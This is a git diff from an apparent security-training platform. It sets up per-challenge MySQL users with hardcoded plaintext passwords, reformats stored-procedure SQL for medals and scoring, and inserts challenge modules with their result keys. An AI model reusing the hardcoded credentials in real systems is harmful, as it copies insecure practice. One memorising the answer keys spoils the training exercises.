+GRANT SELECT ON `SQLiC5Shop`.`vipCoupons` TO 'DnTVipUser'@'localhost';
+
+GRANT USAGE ON *.* TO 'DnTPurUser'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'DnTPurUser'@'localhost';
+CREATE USER 'DnTPurUser'@'localhost' IDENTIFIED BY 'ch3fBrownSa4useIsS00000Go0d';
+GRANT SELECT ON `SQLiC5Shop`.`items` TO 'DnTPurUser'@'localhost';
+GRANT SELECT ON `SQLiC5Shop`.`coupons` TO 'DnTPurUser'@'localhost';
+GRANT SELECT ON `SQLiC5Shop`.`vipCoupons` TO 'DnTPurUser'@'localhost';
+
+GRANT USAGE ON *.* TO 'firstBloodyMessL'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'firstBloodyMessL'@'localhost';
+CREATE USER 'firstBloodyMessL'@'localhost' IDENTIFIED BY 'firstBlooded';
+GRANT SELECT ON `SqlInjLesson`.`tb_users` TO 'firstBloodyMessL'@'localhost';
+
+GRANT USAGE ON *.* TO 'CharlieSeabrook'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'CharlieSeabrook'@'localhost';
+CREATE USER 'CharlieSeabrook'@'localhost' IDENTIFIED BY 'shallowHal';
+GRANT SELECT ON `SqlChalEmail`.`customers` TO 'CharlieSeabrook'@'localhost';
+
+GRANT USAGE ON *.* TO 'RightGuard3d'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'RightGuard3d'@'localhost';
+CREATE USER 'RightGuard3d'@'localhost' IDENTIFIED BY 'logic3Speaker';
+GRANT SELECT ON `SqlChalOne`.`customers` TO 'RightGuard3d'@'localhost';
+
+GRANT USAGE ON *.* TO 'HdmiNoSignal'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'HdmiNoSignal'@'localhost';
+CREATE USER 'HdmiNoSignal'@'localhost' IDENTIFIED BY '1nforma1ion';
+GRANT SELECT ON `SqlChalThree`.`customers` TO 'HdmiNoSignal'@'localhost';
+
+GRANT USAGE ON *.* TO 'randomUserName'@'localhost' IDENTIFIED BY 'password';
+DROP USER  'randomUserName'@'localhost';
+CREATE USER 'randomUserName'@'localhost' IDENTIFIED BY 'c4utionHoT';
+GRANT SELECT ON `BrokenAuthAndSessMangChalTwo`.`users` TO 'randomUserName'@'localhost';
+GRANT UPDATE ON `BrokenAuthAndSessMangChalTwo`.`users` TO 'randomUserName'@'localhost';
+
+GRANT USAGE ON *.* TO 'doveM3nCare'@'localhost' IDENTIFIED BY 'password';
+DROP USER  'doveM3nCare'@'localhost';
+CREATE USER 'doveM3nCare'@'localhost' IDENTIFIED BY 'plusm0r3';
+GRANT SELECT ON `BrokenAuthAndSessMangChalThree`.`users` TO 'doveM3nCare'@'localhost';
+GRANT UPDATE ON `BrokenAuthAndSessMangChalThree`.`users` TO 'doveM3nCare'@'localhost';
+
+GRANT USAGE ON *.* TO 'murr4yFe1ld'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'murr4yFe1ld'@'localhost';
+CREATE USER  'murr4yFe1ld'@'localhost' IDENTIFIED BY '4gainst3ngl4nd';
+GRANT SELECT ON `directObjectRefChalOne`.`users` TO 'murr4yFe1ld'@'localhost';
+
+GRANT USAGE ON *.* TO 'd3nn1sM4nely'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'd3nn1sM4nely'@'localhost';
+CREATE USER  'd3nn1sM4nely'@'localhost' IDENTIFIED BY 'Pr0ductM4rket1ngIssu3s';
+GRANT SELECT ON `directObjectRefChalTwo`.`users` TO 'd3nn1sM4nely'@'localhost';
+
+GRANT USAGE ON *.* TO 'secureDood'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'secureDood'@'localhost';
+CREATE USER  'secureDood'@'localhost' IDENTIFIED BY 'iCantEv3n';
+GRANT SELECT ON `SqlChalFourSuperSecure`.`users` TO 'secureDood'@'localhost';
+
+GRANT USAGE ON *.* TO 'csrfChalEnuer'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'csrfChalEnuer'@'localhost';
+CREATE USER  'csrfChalEnuer'@'localhost' IDENTIFIED BY 'c4n1bUplZ';
+GRANT SELECT ON `csrfChallengeEnumTokens`.`csrfTokens` TO 'csrfChalEnuer'@'localhost';
+GRANT INSERT ON `csrfChallengeEnumTokens`.`csrfTokens` TO 'csrfChalEnuer'@'localhost';
+GRANT UPDATE ON `csrfChallengeEnumTokens`.`csrfTokens` TO 'csrfChalEnuer'@'localhost';
+
+GRANT USAGE ON *.* TO 'l3tsg0cra'@'localhost' IDENTIFIED BY 'password';
+DROP USER  'l3tsg0cra'@'localhost';
+CREATE USER 'l3tsg0cra'@'localhost' IDENTIFIED BY '83ururMa';
+GRANT SELECT ON `BrokenAuthAndSessMangChalFive`.`users` TO 'l3tsg0cra'@'localhost';
+GRANT UPDATE ON `BrokenAuthAndSessMangChalFive`.`users` TO 'l3tsg0cra'@'localhost';
+
+GRANT USAGE ON *.* TO 'csrfChalFour'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'csrfChalFour'@'localhost';
+CREATE USER  'csrfChalFour'@'localhost' IDENTIFIED BY 'R1n13U2pv';
+GRANT SELECT ON `csrfChallengeFour`.`csrfTokens` TO 'csrfChalFour'@'localhost';
+GRANT INSERT ON `csrfChallengeFour`.`csrfTokens` TO 'csrfChalFour'@'localhost';
+GRANT UPDATE ON `csrfChallengeFour`.`csrfTokens` TO 'csrfChalFour'@'localhost';
+
+GRANT USAGE ON *.* TO 'randomMoFoName'@'localhost' IDENTIFIED BY 'password';
+DROP USER  'randomMoFoName'@'localhost';
+CREATE USER 'randomMoFoName'@'localhost' IDENTIFIED BY 'c2zXlq_ZoT';
+GRANT SELECT ON `BrokenAuthAndSessMangChalSix`.`users` TO 'randomMoFoName'@'localhost';
+
+GRANT USAGE ON *.* TO 'randomFlower'@'localhost' IDENTIFIED BY 'password';
+DROP USER  'randomFlower'@'localhost';
+CREATE USER 'randomFlower'@'localhost' IDENTIFIED BY 'c21-le_6oT';
+GRANT SELECT ON `BrokenAuthAndSessMangChalSeven`.`users` TO 'randomFlower'@'localhost';
+
+GRANT USAGE ON *.* TO 'tSwsfUSer'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'tSwsfUSer'@'localhost';
+CREATE USER 'tSwsfUSer'@'localhost' IDENTIFIED BY '9s31iusd-n';
+GRANT SELECT ON `CryptShop`.`items` TO 'tSwsfUSer'@'localhost';
+GRANT SELECT ON `CryptShop`.`coupons` TO 'tSwsfUSer'@'localhost';
+
+GRANT USAGE ON *.* TO 'yourOrEll'@'localhost' IDENTIFIED BY 'password';
+DROP USER  'yourOrEll'@'localhost';
+CREATE USER 'yourOrEll'@'localhost' IDENTIFIED BY '91dj3:766f';
+GRANT SELECT ON `UrlAccessThree`.`users` TO 'yourOrEll'@'localhost';
+
+GRANT USAGE ON *.* TO 'r1ndomFlower'@'localhost' IDENTIFIED BY 'password';
+DROP USER  'r1ndomFlower'@'localhost';
+CREATE USER 'r1ndomFlower'@'localhost' IDENTIFIED BY 'c41-l2_6oT';
+GRANT SELECT ON `sqlInjectSeven`.`users` TO 'r1ndomFlower'@'localhost';
+
+GRANT USAGE ON *.* TO 'al1th3Tokens'@'localhost' IDENTIFIED BY 'password';
+DROP USER  'al1th3Tokens'@'localhost';
+CREATE USER 'al1th3Tokens'@'localhost' IDENTIFIED BY '87SDO63yUN.';
+GRANT SELECT ON `securityMisconfigStealToken`.`tokens` TO 'al1th3Tokens'@'localhost';
+GRANT INSERT ON `securityMisconfigStealToken`.`tokens` TO 'al1th3Tokens'@'localhost';
+GRANT EXECUTE ON PROCEDURE `securityMisconfigStealToken`.`getToken` TO 'al1th3Tokens'@'localhost';
+GRANT EXECUTE ON PROCEDURE `securityMisconfigStealToken`.`validToken`  TO 'al1th3Tokens'@'localhost';
+
+GRANT USAGE ON *.* TO 'theBankMan'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'theBankMan'@'localhost';
+CREATE USER 'theBankMan'@'localhost' IDENTIFIED BY 'B4ndkm.M98n';
+GRANT SELECT ON `directObjectBank`.`bankAccounts` TO 'theBankMan'@'localhost';
+GRANT INSERT ON `directObjectBank`.`bankAccounts` TO 'theBankMan'@'localhost';
+GRANT UPDATE ON `directObjectBank`.`bankAccounts` TO 'theBankMan'@'localhost';
+GRANT EXECUTE ON PROCEDURE `directObjectBank`.`bankAuth` TO 'theBankMan'@'localhost';
+GRANT EXECUTE ON PROCEDURE `directObjectBank`.`currentFunds` TO 'theBankMan'@'localhost';
+GRANT EXECUTE ON PROCEDURE `directObjectBank`.`transferFunds` TO 'theBankMan'@'localhost';
+GRANT EXECUTE ON PROCEDURE `directObjectBank`.`createAccount` TO 'theBankMan'@'localhost';
+
+GRANT USAGE ON *.* TO 'procChalUser'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'procChalUser'@'localhost';
+CREATE USER 'procChalUser'@'localhost' IDENTIFIED BY 'k61dSmsM*8n';
+GRANT SELECT ON `SqlChalStoredProc`.`customers` TO 'procChalUser'@'localhost';
+GRANT EXECUTE ON PROCEDURE `SqlChalStoredProc`.`findUser` TO 'procChalUser'@'localhost';
+
+GRANT USAGE ON *.* TO 'imVideoingThis'@'localhost' IDENTIFIED BY 'password';
+DROP USER 'imVideoingThis'@'localhost';
+CREATE USER 'imVideoingThis'@'localhost' IDENTIFIED BY 'auoi@7723dj';
+GRANT SELECT ON `SqlPoorEscape`.`customers` TO 'imVideoingThis'@'localhost';
diff --git a/src/main/resources/database/updatev3_0tov3_1.sql b/src/main/resources/database/updatev3_0tov3_1.sql
index e247c6118..72742fe8c 100644
--- a/src/main/resources/database/updatev3_0tov3_1.sql
+++ b/src/main/resources/database/updatev3_0tov3_1.sql
@@ -1,67 +1,27 @@
-use
-`core`;
-
-
-CREATE TABLE IF NOT EXISTS `core`.`medals`
-(
-    `medalId`
-    INT
-    NOT
-    NULL
-    AUTO_INCREMENT,
-    `classId`
-    VARCHAR
-(
-    64
-) NULL,
-    `moduleId` VARCHAR
-(
-    64
-) NOT NULL,
-    `scoreBonus` INT NOT NULL DEFAULT 5 ,
-    `goldMedalAvailable` TINYINT
-(
-    1
-) NOT NULL DEFAULT TRUE,
-    `silverMedalAvailable` TINYINT
-(
-    1
-) NOT NULL DEFAULT TRUE,
-    `bronzeMedalAvailable` TINYINT
-(
-    1
-) NOT NULL DEFAULT TRUE,
-    PRIMARY KEY
-(
-    `medalId`
-) ,
-    INDEX `fk_Medals_Modules1`
-(
-    `moduleId` ASC
-) ,
-    CONSTRAINT `fk_Medals_Class1`
-    FOREIGN KEY
-(
-    `classId`
-)
-    REFERENCES `core`.`class`
-(
-    `classId`
-)
+use `core`;
+
+
+CREATE TABLE IF NOT EXISTS `core`.`medals` (
+  `medalId` INT NOT NULL AUTO_INCREMENT,
+  `classId` VARCHAR(64) NULL,
+  `moduleId` VARCHAR(64) NOT NULL,
+  `scoreBonus` INT NOT NULL DEFAULT 5 ,
+  `goldMedalAvailable` TINYINT(1) NOT NULL DEFAULT TRUE,
+  `silverMedalAvailable` TINYINT(1) NOT NULL DEFAULT TRUE,
+  `bronzeMedalAvailable` TINYINT(1) NOT NULL DEFAULT TRUE,
+  PRIMARY KEY (`medalId`) ,
+  INDEX `fk_Medals_Modules1` (`moduleId` ASC) ,
+  CONSTRAINT `fk_Medals_Class1`
+    FOREIGN KEY (`classId` )
+    REFERENCES `core`.`class` (`classId` )
     ON DELETE NO ACTION
     ON UPDATE NO ACTION,
-    CONSTRAINT `fk_Medals_Modules1`
-    FOREIGN KEY
-(
-    `moduleId`
-)
-    REFERENCES `core`.`modules`
-(
-    `moduleId`
-)
+  CONSTRAINT `fk_Medals_Modules1`
+    FOREIGN KEY (`moduleId` )
+    REFERENCES `core`.`modules` (`moduleId` )
     ON DELETE CASCADE
     ON UPDATE CASCADE)
-    ENGINE = InnoDB;
+ENGINE = InnoDB;
 
 
 
@@ -69,16 +29,14 @@ CREATE TABLE IF NOT EXISTS `core`.`medals`
 -- procedure adminFindById
 -- -----------------------------------------------------
 
-USE
-`core`;
+USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`adminFindById`(IN adminId VARCHAR (64))
+CREATE PROCEDURE `core`.`adminFindById` (IN adminId VARCHAR(64))
 BEGIN
 COMMIT;
-SELECT userName
-FROM users
-WHERE userId = adminId
-  AND userRole = 'admin';
+SELECT userName FROM users
+    WHERE userId = adminId
+    AND userRole = 'admin';
 END
 -- $$
 -- DELIMITER ;
@@ -87,16 +45,14 @@ END
 -- -----------------------------------------------------
 -- procedure adminGetAll
 -- -----------------------------------------------------
-USE
-`core`;
+USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`adminGetAll`()
+CREATE PROCEDURE `core`.`adminGetAll` ()
 BEGIN
 COMMIT;
-SELECT userId, userName, userAddress
-FROM users
-WHERE userRole = 'admin'
-ORDER BY userName;
+SELECT userId, userName, userAddress FROM users
+    WHERE userRole = 'admin'
+    ORDER BY userName;
 END
 -- $$
 -- DELIMITER ;
@@ -106,287 +62,164 @@ END
 -- procedure userUpdateResult
 -- -----------------------------------------------------
 
-USE
-`core`;
+USE `core`;
 -- DELIMITER $$
 DROP PROCEDURE `core`.`userUpdateResult`;
 -- $$
 -- DELIMITER ;
 
-USE
-`core`;
+USE `core`;
 -- DELIMITER $$
 
-CREATE PROCEDURE `core`.`userUpdateResult`(IN theModuleId VARCHAR (64), IN theUserId VARCHAR (64), IN theBefore INT,
-                                           IN theAfter INT, IN theDifficulty INT, IN theAdditionalInfo LONGTEXT)
+CREATE PROCEDURE `core`.`userUpdateResult` (IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64), IN theBefore INT, IN theAfter INT, IN theDifficulty INT, IN theAdditionalInfo LONGTEXT)
 BEGIN
-DECLARE
-theDate TIMESTAMP;
-DECLARE
-theClassId VARCHAR(64);
-DECLARE
-theBonus INT;
-DECLARE
-totalScore INT;
-DECLARE
-medalInfo INT; -- Used to find out if there is a medal available
-DECLARE
-goldMedalInfo INT;
-DECLARE
-silverMedalInfo INT;
-DECLARE
-bronzeMedalInfo INT;
-DECLARE
-medalRow INT;
+DECLARE theDate TIMESTAMP;
+DECLARE theClassId VARCHAR(64);
+DECLARE theBonus INT;
+DECLARE totalScore INT;
+DECLARE medalInfo INT; -- Used to find out if there is a medal available
+DECLARE goldMedalInfo INT;
+DECLARE silverMedalInfo INT;
+DECLARE bronzeMedalInfo INT;
+DECLARE medalRow INT;
 COMMIT;
 
 -- Does this Module/class combo exist in the DB?
-SELECT classId
-FROM users
-WHERE userid = theUserId INTO theClassId;
-IF
-(theClassId IS NULL) THEN
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
-  AND classId IS NULL INTO medalRow;
+SELECT classId FROM users WHERE userid = theUserId INTO theClassId;
+IF (theClassId IS NULL) THEN
+  SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId IS NULL INTO medalRow;
 ELSE
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
-  AND classId = theClassId INTO medalRow;
+  SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId INTO medalRow;
 END IF;
-IF
-(medalRow < 1) THEN
+IF (medalRow < 1) THEN
   INSERT INTO medals (classId, moduleId) VALUES (theClassId, theModuleId);
 END IF;
 COMMIT;
-SELECT NOW()
-FROM DUAL INTO theDate;
+SELECT NOW() FROM DUAL
+    INTO theDate;
 -- Get current bonus and decrement the bonus value
-SELECT 0
-FROM DUAL INTO totalScore;
+SELECT 0 FROM DUAL INTO totalScore;
 
 
 
-IF
-(theClassId IS NULL) THEN
-SELECT scoreBonus
-FROM medals
-WHERE moduleId = theModuleId
-  AND classId IS NULL INTO theBonus;
+
+IF (theClassId IS NULL) THEN
+  SELECT scoreBonus FROM medals WHERE moduleId = theModuleId AND classId IS NULL INTO theBonus;
 ELSE
-SELECT scoreBonus
-FROM medals
-WHERE moduleId = theModuleId
-  AND classId = theClassId INTO theBonus;
+  SELECT scoreBonus FROM medals WHERE moduleId = theModuleId AND classId = theClassId INTO theBonus;
 END IF;
-IF
-(theBonus > 0) THEN
-SELECT (totalScore + theBonus)
-FROM DUAL INTO totalScore;
-IF
-(theClassId IS NULL) THEN
-UPDATE medals
-SET scoreBonus = scoreBonus - 1
-WHERE moduleId = theModuleId
-  AND classId IS NULL;
-ELSE
-UPDATE medals
-SET scoreBonus = scoreBonus - 1
-WHERE moduleId = theModuleId
-  AND classId = theClassId;
+IF (theBonus > 0) THEN
+    SELECT (totalScore + theBonus) FROM DUAL
+        INTO totalScore;
+    IF (theClassId IS NULL) THEN
+      UPDATE medals SET scoreBonus = scoreBonus - 1 WHERE moduleId = theModuleId AND classId IS NULL;
+    ELSE
+      UPDATE medals SET scoreBonus = scoreBonus - 1 WHERE moduleId = theModuleId AND classId = theClassId;
 
 
 
-END IF;
-COMMIT;
+
+    END IF;
+    COMMIT;
 END IF;
 
 
 
-IF
-(theClassId IS NULL) THEN
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
-  AND (goldMedalAvailable = TRUE OR silverMedalAvailable = TRUE OR bronzeMedalAvailable = TRUE)
-  AND classId IS NULL INTO medalInfo;
+IF (theClassId IS NULL) THEN
+  SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND (goldMedalAvailable = TRUE OR silverMedalAvailable = TRUE OR bronzeMedalAvailable = TRUE) AND classId IS NULL INTO medalInfo;
 ELSE
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
-  AND classId = theClassId
-  AND (goldMedalAvailable = TRUE OR silverMedalAvailable = TRUE OR bronzeMedalAvailable = TRUE) INTO medalInfo;
+  SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId AND (goldMedalAvailable = TRUE OR silverMedalAvailable = TRUE OR bronzeMedalAvailable = TRUE) INTO medalInfo;
 END IF;
 COMMIT;
 
-IF
-(medalInfo > 0) THEN
+IF (medalInfo > 0) THEN
   IF (theClassId IS NULL) THEN
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
-  AND goldMedalAvailable = TRUE
-  AND classId IS NULL INTO goldMedalInfo;
-ELSE
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
-  AND classId = theClassId
-  AND goldMedalAvailable = TRUE INTO goldMedalInfo;
-END IF;
-  IF
-(goldMedalInfo > 0) THEN
-UPDATE users
-SET goldMedalCount = goldMedalCount + 1
-WHERE userId = theUserId;
-IF
-(theClassId IS NULL) THEN
-UPDATE medals
-SET goldMedalAvailable = FALSE
-WHERE moduleId = theModuleId
-  AND classId IS NULL;
+    SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND goldMedalAvailable = TRUE AND classId IS NULL INTO goldMedalInfo;
+  ELSE
+    SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId AND goldMedalAvailable = TRUE INTO goldMedalInfo;
+  END IF;
+  IF (goldMedalInfo > 0) THEN
+    UPDATE users SET goldMedalCount = goldMedalCount + 1 WHERE userId = theUserId;
+    IF (theClassId IS NULL) THEN
+      UPDATE medals SET goldMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId IS NULL;
 
-ELSE
-UPDATE medals
-SET goldMedalAvailable = FALSE
-WHERE moduleId = theModuleId
-  AND classId = theClassId;
-END IF;
-COMMIT;
-ELSE
+    ELSE
+      UPDATE medals SET goldMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId = theClassId;
+    END IF;
+    COMMIT;
+  ELSE
     IF (theClassId IS NULL) THEN
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
-  AND silverMedalAvailable = TRUE
-  AND classId IS NULL INTO silverMedalInfo;
-ELSE
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
-  AND classId = theClassId
-  AND silverMedalAvailable = TRUE INTO silverMedalInfo;
-END IF;
-    IF
-(silverMedalInfo > 0) THEN
-UPDATE users
-SET silverMedalCount = silverMedalCount + 1
-WHERE userId = theUserId;
-IF
-(theClassId IS NULL) THEN
-UPDATE medals
-SET silverMedalAvailable = FALSE
-WHERE moduleId = theModuleId
-  AND classId IS NULL;
+      SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND silverMedalAvailable = TRUE AND classId IS NULL INTO silverMedalInfo;
+    ELSE
+      SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId AND silverMedalAvailable = TRUE INTO silverMedalInfo;
+    END IF;
+    IF (silverMedalInfo > 0) THEN
+      UPDATE users SET silverMedalCount = silverMedalCount + 1 WHERE userId = theUserId;
+      IF (theClassId IS NULL) THEN
+        UPDATE medals SET silverMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId IS NULL;
 
-ELSE
-UPDATE medals
-SET silverMedalAvailable = FALSE
-WHERE moduleId = theModuleId
-  AND classId = theClassId;
-END IF;
-COMMIT;
-ELSE
+      ELSE
+        UPDATE medals SET silverMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId = theClassId;
+      END IF;
+      COMMIT;
+    ELSE
       IF (theClassId IS NULL) THEN
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
-  AND bronzeMedalAvailable = TRUE
-  AND classId IS NULL INTO bronzeMedalInfo;
-ELSE
-SELECT count(moduleId)
-FROM medals
-WHERE moduleId = theModuleId
-  AND classId = theClassId
-  AND bronzeMedalAvailable = TRUE INTO bronzeMedalInfo;
-END IF;
-      IF
-(bronzeMedalInfo > 0) THEN
-UPDATE users
-SET bronzeMedalCount = bronzeMedalCount + 1
-WHERE userId = theUserId;
-IF
-(theClassId IS NULL) THEN
-UPDATE medals
-SET bronzeMedalAvailable = FALSE
-WHERE moduleId = theModuleId
-  AND classId IS NULL;
-ELSE
-UPDATE medals
-SET bronzeMedalAvailable = FALSE
-WHERE moduleId = theModuleId
-  AND classId = theClassId;
-END IF;
-COMMIT;
-END IF;
-END IF;
-END IF;
+        SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND bronzeMedalAvailable = TRUE AND classId IS NULL INTO bronzeMedalInfo;
+      ELSE
+        SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId AND bronzeMedalAvailable = TRUE INTO bronzeMedalInfo;
+      END IF;
+      IF (bronzeMedalInfo > 0) THEN
+        UPDATE users SET bronzeMedalCount = bronzeMedalCount + 1 WHERE userId = theUserId;
+        IF (theClassId IS NULL) THEN
+          UPDATE medals SET bronzeMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId IS NULL;
+        ELSE
+          UPDATE medals SET bronzeMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId = theClassId;
+        END IF;
+        COMMIT;
+      END IF;
+    END IF;
+  END IF;
 END IF;
 
 -- Get the Score value for the level
-SELECT (totalScore + scoreValue)
-FROM modules
-WHERE moduleId = theModuleId INTO totalScore;
+SELECT (totalScore + scoreValue) FROM modules
+    WHERE moduleId = theModuleId
+    INTO totalScore;
 
 -- Update users score
-UPDATE users
-SET userScore = userScore + totalScore
-WHERE userId = theUserId;
+UPDATE users SET
+    userScore = userScore + totalScore
+    WHERE userId = theUserId;
 COMMIT;
 
 -- Update result row
-UPDATE results
-SET finishTime         = theDate,
-    `knowledgeBefore`  = theBefore,
-    `knowledgeAfter`   = theAfter,
-    `difficulty`       = theDifficulty,
+UPDATE results SET
+    finishTime = theDate,
+    `knowledgeBefore` = theBefore,
+    `knowledgeAfter` = theAfter,
+    `difficulty`  = theDifficulty,
     `resultSubmission` = theAdditionalInfo
-WHERE startTime IS NOT NULL
-  AND finishTime IS NULL
-  AND userId = theUserId
-  AND moduleId = theModuleId;
+    WHERE startTime IS NOT NULL
+    AND finishTime IS NULL
+    AND userId = theUserId
+    AND moduleId = theModuleId;
 COMMIT;
-SELECT moduleName
-FROM modules
-         JOIN results USING (moduleId)
-WHERE startTime IS NOT NULL
-  AND finishTime IS NOT NULL
-  AND userId = theUserId
-  AND moduleId = theModuleId;
+SELECT moduleName FROM modules
+    JOIN results USING (moduleId)
+    WHERE startTime IS NOT NULL
+    AND finishTime IS NOT NULL
+    AND userId = theUserId
+    AND moduleId = theModuleId;
 END
 
 -- $$
 -- DELIMITER ;
 ;
 
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`)
-VALUES ('6f5db377c28da4179bca1a43ede8d6bcf7bd322e', 'Untrusted Input', 'untrusted.input', 'lesson',
-        'Mobile Security Decisions via Untrusted Input', 'mobile.security.decisions.via.untrusted.input',
-        'RetroMagicFuturePunch', '5e2b61c679d1f290d23308b3b66c3ec00cd069f1483b705d17f2795a4e77dcb6', 'open', '82', '50',
-        1);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`)
-VALUES ('064e28ea4b2f7708b8cb4495d9db1a5e05decdb8', 'Poor Authentication 2', 'poor.authentication.2', 'challenge',
-        'Mobile Poor Authentication', 'mobile.poor.authentication', 'MoreRobotsNotEnoughNuts',
-        '808d8372ec7bc7e37e8e3b30d313cb47763926065a4623b27b24cc537fee72a7', 'open', '173', '70', 1);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`)
-VALUES ('6a411618a05e3cef8ccb6f3d7914412d27782a88', 'Content Provider Leakage 1', 'content.provider.leakage.1',
-        'challenge', 'Mobile Content Provider', 'mobile.content.provider', 'BlueCupNoPartySorry',
-        '2a845ec1943a6342956a48cdc8ca60f40036b68a810109d0b9d2a35271377980', 'open', '178', '75', 1);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
-                     `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
-                     `scoreValue`, `hardcodedKey`)
-VALUES ('f02ce6bcd0a822d245433533997eaf44379065f4', 'Insecure Cryptographic Storage Home Made Key',
-        'insecure.cryptographic.storage.home.made.key', 'challenge', 'Insecure Cryptographic Storage',
-        'insecure.cryptographic.storage', '59A8D9A8020C61B3D76A600F94AJCECEABEDD44DF26874BD070BD07D',
-        '9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4', 'open', '240', '140', 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`) VALUES ('6f5db377c28da4179bca1a43ede8d6bcf7bd322e', 'Untrusted Input', 'untrusted.input', 'lesson', 'Mobile Security Decisions via Untrusted Input', 'mobile.security.decisions.via.untrusted.input', 'RetroMagicFuturePunch', '5e2b61c679d1f290d23308b3b66c3ec00cd069f1483b705d17f2795a4e77dcb6', 'open', '82', '50', 1);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`) VALUES ('064e28ea4b2f7708b8cb4495d9db1a5e05decdb8', 'Poor Authentication 2', 'poor.authentication.2','challenge', 'Mobile Poor Authentication', 'mobile.poor.authentication', 'MoreRobotsNotEnoughNuts', '808d8372ec7bc7e37e8e3b30d313cb47763926065a4623b27b24cc537fee72a7', 'open', '173', '70', 1);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`) VALUES ('6a411618a05e3cef8ccb6f3d7914412d27782a88', 'Content Provider Leakage 1', 'content.provider.leakage.1', 'challenge', 'Mobile Content Provider', 'mobile.content.provider', 'BlueCupNoPartySorry', '2a845ec1943a6342956a48cdc8ca60f40036b68a810109d0b9d2a35271377980', 'open', '178', '75', 1);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`) VALUES ('f02ce6bcd0a822d245433533997eaf44379065f4', 'Insecure Cryptographic Storage Home Made Key', 'insecure.cryptographic.storage.home.made.key', 'challenge', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage', '59A8D9A8020C61B3D76A600F94AJCECEABEDD44DF26874BD070BD07D', '9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4', 'open', '240', '140', 0);
 
 
 CALL cheatSheetCreate('6f5db377c28da4179bca1a43ede8d6bcf7bd322e', '6f5db377c28da4179bca1a43ede8d6bcf7bd322e.solution');
diff --git a/src/main/resources/i18n/challenges/csrf/csrfStrings.properties b/src/main/resources/i18n/challenges/csrf/csrfStrings.properties
index 00f26636b..e4ab80292 100644
--- a/src/main/resources/i18n/challenges/csrf/csrfStrings.properties
+++ b/src/main/resources/i18n/challenges/csrf/csrfStrings.properties
@@ -1,39 +1,44 @@
-challenge.intro=To complete this challenge, you must get your CSRF counter above 0. Once The request to increment your counter is as follows;
-challenge.withThisParameter=With the following parameter;
